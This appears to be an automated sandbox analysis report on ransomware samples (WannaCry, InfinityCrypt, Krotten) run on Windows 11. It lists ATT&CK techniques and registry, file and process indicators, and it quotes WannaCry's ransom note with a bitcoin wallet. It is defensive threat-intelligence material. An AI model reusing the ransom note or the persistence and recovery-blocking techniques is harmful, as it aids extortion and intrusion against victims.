infinitylock | hxxps://github[.]com/ytisf/theZoo/tree/master/malwares/Binaries/Ransomware[.]WannaCry

Resubmissions

21-01-2025 00:56

250121-banncaxrgv 3

20-01-2025 19:04

250120-xqx3lstqey 10

Analysis

max time kernel
546s
max time network
551s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
20-01-2025 19:04

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://github.com/ytisf/theZoo/tree/master/malwares/Binaries/Ransomware.WannaCry

Score

10^/10

infinitylock wannacry defense_evasion discovery execution impact persistence ransomware spyware stealer worm

Malware Config

Extracted

Path

C:\Users\Admin\Downloads\!Please Read Me!.txt

Family

wannacry

Ransom Note

Q: What's wrong with my files? A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted. If you follow our instructions we guarantee that you can decrypt all your files quickly and safely! Let's start decrypting! Q: What do I do? A: First, you need to pay service fees for the decryption. Please send $300 worth of bitcoin to this bitcoin address: 15zGqZCTcys6eCjDkE3DypCjXi6QWRV6V1 Next, please find the decrypt software on your desktop, an executable file named "!WannaDecryptor!.exe". If it does not exsit, download the software from the address below. (You may need to disable your antivirus for a while.) rar password: wcry123 Run and follow the instructions! �

Wallets

15zGqZCTcys6eCjDkE3DypCjXi6QWRV6V1

Signatures

InfinityLock Ransomware
Also known as InfinityCrypt. Based on the open-source HiddenTear ransomware.
ransomware infinitylock
Infinitylock family
infinitylock
Wannacry
WannaCry is a ransomware cryptoworm.
ransomware worm wannacry
Wannacry family
wannacry
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047

Blocklisted process makes network request 4 IoCs

flow	pid	Process
80	1620	powershell.exe
81	1620	powershell.exe
88	2104	powershell.exe
90	2104	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
1620	powershell.exe
2104	powershell.exe

Disables RegEdit via registry modification 2 IoCs

defense_evasion

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	Krotten.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	Krotten.exe

Disables Task Manager via registry modification
defense_evasion
Downloads MZ/PE file

Drops startup file 2 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SD4DF8.tmp	WannaCry.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SD4DFF.tmp	WannaCry.exe

Executes dropped EXE 9 IoCs

pid	Process
3776	robux.exe
3048	InfinityCrypt.exe
2064	InfinityCrypt.exe
2960	Krotten.exe
4948	WannaCry.exe
1700	!WannaDecryptor!.exe
2028	!WannaDecryptor!.exe
4008	!WannaDecryptor!.exe
1508	!WannaDecryptor!.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft Update Task Scheduler = "\"C:\\Users\\Admin\\Downloads\\WannaCry.exe\" /r"	WannaCry.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\WINDOWS\\Web\\rundll32.exe"	Krotten.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\AVPCC = "C:\\WINDOWS\\Cursors\\avp.exe"	Krotten.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
71	raw.githubusercontent.com
79	raw.githubusercontent.com

Modifies WinLogon 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "DANGER"	Krotten.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "Äëÿ òîãî ÷òîáû âîññòàíîâèòü íîðìàëüíóþ ðàáîòó ñâîåãî êîìïüþòåðà íå ïîòåðÿâ ÂÑÞ èíôîðìàöèþ! È ñ ýêîíîìèâ äåíüãè, ïðèøëè ìíå íà e-mail [email protected] êîä ïîïîëíåíèÿ ñ÷åòà êèåâñòàð íà 25 ãðèâåíü. Â îòâåò â òå÷åíèå äâåíàäöàòè ÷àñîâ íà ñâîé e-mail òû ïîëó÷èøü ôàèë äëÿ óäàëåíèÿ ýòîé ïðîãðàììû."	Krotten.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\!WannaCryptor!.bmp"	!WannaDecryptor!.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\HomeBanner.svg.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C	InfinityCrypt.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\themes\dark\bun.png.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C	InfinityCrypt.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\root\ui-strings.js.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C	InfinityCrypt.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\ResiliencyLinks\Locales\devtools\fr.pak.DATA.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C	InfinityCrypt.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C	InfinityCrypt.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\check-mark-1x.png.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C	InfinityCrypt.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\90.0.818.66\Locales\zh-CN.pak.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C	InfinityCrypt.exe
File opened for modification	C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\fr\Microsoft.PowerShell.PackageManagement.resources.dll.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C	InfinityCrypt.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\themes\dark\A12_Checkmark_White@1x.png.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C	InfinityCrypt.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\zh-hk_get.svg.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C	InfinityCrypt.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\css\main.css.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C	InfinityCrypt.exe
File opened for modification	C:\Program Files (x86)\Google\Update\1.3.36.371\GoogleUpdateBroker.exe.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C	InfinityCrypt.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\d3dcompiler_47.dll.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C	InfinityCrypt.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\uk-ua\ui-strings.js.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C	InfinityCrypt.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\images\example_icons.png.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C	InfinityCrypt.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\scan.png.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C	InfinityCrypt.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\themes\dark\hscroll-thumb.png.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C	InfinityCrypt.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\themes\dark\example_icons.png.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C	InfinityCrypt.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\themes\dark\A12_delete@1x.png.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C	InfinityCrypt.exe
File opened for modification	C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\Microsoft.PackageManagement.MetaProvider.PowerShell.dll.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C	InfinityCrypt.exe
File opened for modification	C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\ja-JP\PSGet.Resource.psd1.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C	InfinityCrypt.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\ResiliencyLinks\Locales\tt.pak.DATA.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C	InfinityCrypt.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_reportabuse-default_18.svg.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C	InfinityCrypt.exe
File opened for modification	C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\de-DE\PSGet.Resource.psd1.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C	InfinityCrypt.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\90.0.818.66\VisualElements\LogoDev.png.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C	InfinityCrypt.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\da-dk\ui-strings.js.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C	InfinityCrypt.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\themes\dark\rhp_world_icon_2x.png.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C	InfinityCrypt.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\IDTemplates\ENU\DefaultID.pdf.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C	InfinityCrypt.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\theme-2x.png.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C	InfinityCrypt.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\fr-fr\ui-strings.js.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C	InfinityCrypt.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\icons_retina.png.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C	InfinityCrypt.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\themes\dark\faf_icons.png.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C	InfinityCrypt.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\zh-cn\ui-strings.js.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C	InfinityCrypt.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\identity_helper.exe.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C	InfinityCrypt.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\90.0.818.66\ResiliencyLinks\Locales\devtools\pt-BR.pak.DATA.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C	InfinityCrypt.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\ja-jp\ui-strings.js.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C	InfinityCrypt.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\themes\dark\icons.png.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C	InfinityCrypt.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\nl-nl\ui-strings.js.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C	InfinityCrypt.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\ja-jp\ui-strings.js.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C	InfinityCrypt.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\de-de\ui-strings.js.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C	InfinityCrypt.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\90.0.818.66\ResiliencyLinks\EdgeWebView.dat.DATA.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C	InfinityCrypt.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ahclient.dll.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C	InfinityCrypt.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\TrackedSend.aapp.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C	InfinityCrypt.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\de-DE\EppManifest.dll.mui.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C	InfinityCrypt.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AXE8SharedExpat.dll.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C	InfinityCrypt.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\cs-cz\ui-strings.js.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C	InfinityCrypt.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\zh-cn_get.svg.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C	InfinityCrypt.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\AddressBook.png.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C	InfinityCrypt.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\hi_contrast\core_icons__retina_hiContrast_bow.png.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C	InfinityCrypt.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\90.0.818.66\Locales\devtools\pt-BR.pak.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C	InfinityCrypt.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\Locales\te.pak.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C	InfinityCrypt.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\themes\dark\dot_2x.png.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C	InfinityCrypt.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\misc\altDekstopCopyPasteHelper.js.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C	InfinityCrypt.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\nl-nl\ui-strings.js.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C	InfinityCrypt.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\it-it\ui-strings.js.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C	InfinityCrypt.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_delete_18.svg.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C	InfinityCrypt.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\fi-fi\ui-strings.js.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C	InfinityCrypt.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\Locales\cs.pak.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C	InfinityCrypt.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\90.0.818.66\ResiliencyLinks\Locales\pt-PT.pak.DATA.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C	InfinityCrypt.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\images\themeless\web_documentcloud_logo.png.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C	InfinityCrypt.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\sl-si\ui-strings.js.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C	InfinityCrypt.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\pl-pl\ui-strings.js.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C	InfinityCrypt.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\sk-sk\ui-strings.js.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C	InfinityCrypt.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\90.0.818.66\Locales\fa.pak.B3BF66A5A6CE890FB7DAF3EE37DCB76419C63ECD1AC3B1914BABF7E0FA7B013C	InfinityCrypt.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\WINDOWS\Web	Krotten.exe

Subvert Trust Controls: Mark-of-the-Web Bypass 1 TTPs 4 IoCs

When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.

defense_evasion

SIP and Trust Provider Hijacking

T1553.003

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\WannaCry.exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\robux.exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\InfinityCrypt.exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Krotten.exe:Zone.Identifier	msedge.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 18 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	InfinityCrypt.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	!WannaDecryptor!.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	!WannaDecryptor!.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	InfinityCrypt.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Krotten.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	!WannaDecryptor!.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	!WannaDecryptor!.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	robux.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WannaCry.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	InfinityCrypt.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	InfinityCrypt.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	InfinityCrypt.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	InfinityCrypt.exe

Delays execution with timeout.exe 4 IoCs

defense_evasion

pid	Process
4500	timeout.exe
3156	timeout.exe
2296	timeout.exe
4696	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Kills process with taskkill 4 IoCs

defense_evasion

pid	Process
3032	taskkill.exe
112	taskkill.exe
3792	taskkill.exe
3280	taskkill.exe

Modifies Control Panel 6 IoCs

defense_evasion

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000\Control Panel\Desktop	Krotten.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000\Control Panel\Desktop\WallpaperOriginX = "210"	Krotten.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000\Control Panel\Desktop\WallpaperOriginY = "187"	Krotten.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000\Control Panel\Desktop\MenuShowDelay = "9999"	Krotten.exe
Key created	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000\Control Panel\International	Krotten.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000\Control Panel\International\sTimeFormat = "ÕÓÉ"	Krotten.exe

Modifies Internet Explorer settings 1 TTPs 4 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000\Software\Microsoft\Internet Explorer\Main\Window title = ":::::::::::::::::: ÌÎÉ ÕÓÉ ÏÐÎÒÓÕ À ÏÈÇÄÀ ÃÍÈÅÒ ::::::::::::::::::"	Krotten.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Main	Krotten.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\Window title = ":::::::::::::::::: ÌÎÉ ÕÓÉ ÏÐÎÒÓÕ À ÏÈÇÄÀ ÃÍÈÅÒ ::::::::::::::::::"	Krotten.exe
Key created	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000\Software\Microsoft\Internet Explorer\Main	Krotten.exe

Modifies Internet Explorer start page 1 TTPs 2 IoCs

stealer

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000\Software\Microsoft\Internet Explorer\Main\Start Page = "http://poetry.rotten.com/lightning/"	Krotten.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\Start Page = "http://poetry.rotten.com/lightning/"	Krotten.exe

Modifies registry class 1 IoCs

description	ioc	Process
